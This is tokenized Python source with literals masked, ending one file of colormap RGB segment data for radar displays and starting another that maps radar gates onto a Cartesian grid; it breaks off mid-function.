, <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BuOr8_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _Cat12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BuGy8_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BuOrR14_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _BuOr10_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _BuDRd12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _LangRainbow12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> datad = { <EOL> '<STR_LIT>' : _NWSRef_data , <EOL> '<STR_LIT>' : _NWSVel_data , <EOL> '<STR_LIT>' : _NWS_SPW_data , <EOL> '<STR_LIT>' : _RefDiff_data , <EOL> '<STR_LIT>' : _Carbone11_data , <EOL> '<STR_LIT>' : _Carbone17_data , <EOL> '<STR_LIT>' : _RRate11_data , <EOL> '<STR_LIT>' : _BlueBrown10_data , <EOL> '<STR_LIT>' : _BlueBrown11_data , <EOL> '<STR_LIT>' : _Theodore16_data , <EOL> '<STR_LIT>' : _EWilson17_data , <EOL> '<STR_LIT>' : _Wild25_data , <EOL> '<STR_LIT>' : _SCook18_data , <EOL> '<STR_LIT>' : _PD17_data , <EOL> '<STR_LIT>' : _Gray5_data , <EOL> '<STR_LIT>' : _Gray9_data , <EOL> '<STR_LIT>' : _SymGray12_data , <EOL> '<STR_LIT>' : _Carbone42_data , <EOL> '<STR_LIT>' : _BrBu12_data , <EOL> '<STR_LIT>' : _GrMg16_data , <EOL> '<STR_LIT>' : _BrBu10_data , <EOL> '<STR_LIT>' : _Bu10_data , <EOL> '<STR_LIT>' : _BuDOr12_data , <EOL> '<STR_LIT>' : _StepSeq25_data , <EOL> '<STR_LIT>' : _RdYlBu11b_data , <EOL> '<STR_LIT>' : _Bu7_data , <EOL> '<STR_LIT>' : _BuOr12_data , <EOL> '<STR_LIT>' : _BuGr14_data , <EOL> '<STR_LIT>' : _BuDRd18_data , <EOL> '<STR_LIT>' : _BuDOr18_data , <EOL> '<STR_LIT>' : _BuOr8_data , <EOL> '<STR_LIT>' : _Cat12_data , <EOL> '<STR_LIT>' : _BuGy8_data , <EOL> '<STR_LIT>' : _BuOrR14_data , <EOL> '<STR_LIT>' : _BuOr10_data , <EOL> '<STR_LIT>' : _BuDRd12_data , <EOL> '<STR_LIT>' : _LangRainbow12_data , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from . . core . radar import Radar <EOL> from . . core . transforms import geographic_to_cartesian <EOL> from . . filters import GateFilter , moment_based_gate_filter <EOL> from . _gate_to_grid_map import GateToGridMapper <EOL> from . _gate_to_grid_map import RoIFunction , ConstantRoI , DistBeamRoI , DistRoI <EOL> def map_gates_to_grid ( <EOL> radars , grid_shape , grid_limits , grid_origin = None , <EOL> grid_origin_alt = None , grid_projection = None , <EOL> fields = None , gatefilters = False , map_roi = True , <EOL> weighting_function = '<STR_LIT>' , toa = <NUM_LIT> , roi_func = '<STR_LIT>' , <EOL> constant_roi = <NUM_LIT> , z_factor = <NUM_LIT> , xy_factor = <NUM_LIT> , min_radius = <NUM_LIT> , <EOL> h_factor = <NUM_LIT:1.0> , nb = <NUM_LIT> , bsp = <NUM_LIT:1.0> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( radars , Radar ) : <EOL> radars = ( radars , ) <EOL> skip_transform = False <EOL> if len ( radars ) == <NUM_LIT:1> and grid_origin_alt is None and grid_origin is None : <EOL> skip_transform = True <EOL> if grid_origin_alt is None : <EOL> grid_origin_alt = float ( radars [ <NUM_LIT:0> ] . altitude [ '<STR_LIT:data>' ] ) <EOL> gatefilters = _parse_gatefilters ( gatefilters , radars ) <EOL> cy_weighting_function = _detemine_cy_weighting_func ( weighting_function ) <EOL> projparams = _find_projparams ( grid_origin , radars , grid_projection ) <EOL> fields = _determine_fields ( fields , radars ) <EOL> grid_starts , grid_steps = _find_grid_params ( grid_shape , grid_limits ) <EOL> offsets = _find_offsets ( radars , projparams , grid_origin_alt ) <EOL> roi_func = _parse_roi_func ( roi_func , constant_roi , z_factor , xy_factor , <EOL> min_radius , h_factor , nb , bsp , offsets ) <EOL> nfields = len ( fields ) <EOL> grid_sum = np . zeros ( grid_shape + ( nfields , ) , dtype = np . float32 ) <EOL> grid_wsum = np . zeros ( grid_shape + ( nfields , ) , dtype = np . float32 ) <EOL> gatemapper = GateToGridMapper ( <EOL> grid_shape , grid_starts , grid_steps , grid_sum , grid_wsum ) <EOL> for radar , gatefilter in zip ( radars , gatefilters ) : <EOL> shape = ( radar . nrays , radar . ngates , nfields ) <EOL> field_data = np . empty ( shape , dtype = '<STR_LIT>' ) <EOL> field_mask = np . empty ( shape , dtype = '<STR_LIT>' ) <EOL> for i , field in enumerate ( fields ) : <EOL> fdata = radar . fields [ field ] [ '<STR_LIT:data>' ] <EOL> field_data [ : , : , i ] = np . ma . getdata ( fdata ) <EOL> field_mask [ : , : , i ] = np . ma . getmaskarray ( fdata ) <EOL> if gatefilter is False : <EOL> gatefilter = GateFilter ( radar ) <EOL> elif gatefilter is None : <EOL> gatefilter = moment_based_gate_filter ( radar , ** kwargs ) <EOL> excluded_gates = gatefilter . gate_excluded . astype ( '<STR_LIT>' ) <EOL> if skip_transform : <EOL> gate_x = radar . gate_x [ '<STR_LIT:data>' ] <EOL> gate_y = radar . gate_y [ '<STR_LIT:data>' ] <EOL> else : <EOL> gate_x , gate_y = geographic_to_cartesian ( <EOL> radar . gate_longitude [ '<STR_LIT:data>' ] , radar . gate_latitude [ '<STR_LIT:data>' ] , <EOL> projparams ) <EOL> gate_z = radar . gate_altitude [ '<STR_LIT:data>' ] - grid_origin_alt <EOL> gatemapper . map_gates_to_grid ( <EOL> radar . ngates , radar . nrays , gate_z . astype ( '<STR_LIT>' ) , <EOL> gate_y . astype ( '<STR_LIT>' ) , gate_x . astype ( '<STR_LIT>' ) , <EOL> field_data , field_mask , excluded_gates , <EOL> toa , roi_func , cy_weighting_function ) <EOL> mweight = np . ma . masked_equal ( grid_wsum , <NUM_LIT:0> ) <EOL> msum = np . ma . masked_array ( grid_sum , mweight . mask ) <EOL> grids = dict ( <EOL> [ ( f , msum [ ... , i ] / mweight [ ... , i ] ) for i , f in enumerate ( fields ) ] ) <EOL> if map_roi : <EOL> roi_array = np . empty ( grid_shape , dtype = np . float32 ) <EOL> gatemapper . find_roi_for_grid ( roi_array , roi_func ) <EOL> grids [ '<STR_LIT>' ] = roi_array <EOL> return grids <EOL> def _detemine_cy_weighting_func ( weighting_function ) : <EOL> """<STR_LIT>""" <EOL> if weighting_function . upper ( ) == '<STR_LIT>' : <EOL> cy_weighting_function = <NUM_LIT:1> <EOL> elif weighting_function . upper ( ) == '<STR_LIT>' : <EOL> cy_weighting_function = <NUM_LIT:0> <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return cy_weighting_function <EOL> def _find_projparams ( grid_origin , radars , grid_projection ) : <EOL> """<STR_LIT>""" <EOL> if grid_origin is None : <EOL> lat = float ( radars [ <NUM_LIT:0> ] . latitude [ '<STR_LIT:data>' ] ) <EOL> lon = float ( radars [ <NUM_LIT:0> ] . longitude [ '<STR_LIT:data>' ] ) <EOL> grid_origin = ( lat , lon ) <EOL> grid_origin_lat , grid_origin_lon = grid_origin <EOL> if grid_projection is None : <EOL> grid_projection = { <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True } <EOL> projparams = grid_projection . copy ( ) <EOL> if projparams . pop ( '<STR_LIT>' , False ) : <EOL> projparams [ '<STR_LIT>' ] = grid_origin_lon <EOL> projparams [ '<STR_LIT>' ] = grid_origin_lat <EOL> return projparams <EOL> def _parse_gatefilters ( gatefilters , radars ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( gatefilters , GateFilter ) : <EOL> gatefilters = ( gatefilters , ) <EOL> if gatefilters is False : <EOL> gatefilters = ( False , ) * len ( radars ) <EOL> if gatefilters is None : <EOL> gatefilters = ( None , ) * len ( radars ) <EOL> if len ( gatefilters ) != len ( radars ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return gatefilters <EOL> def _determine_fields ( fields , radars ) : <EOL> """<STR_LIT>""" <EOL> if fields is None : <EOL> fields = set ( radars [ 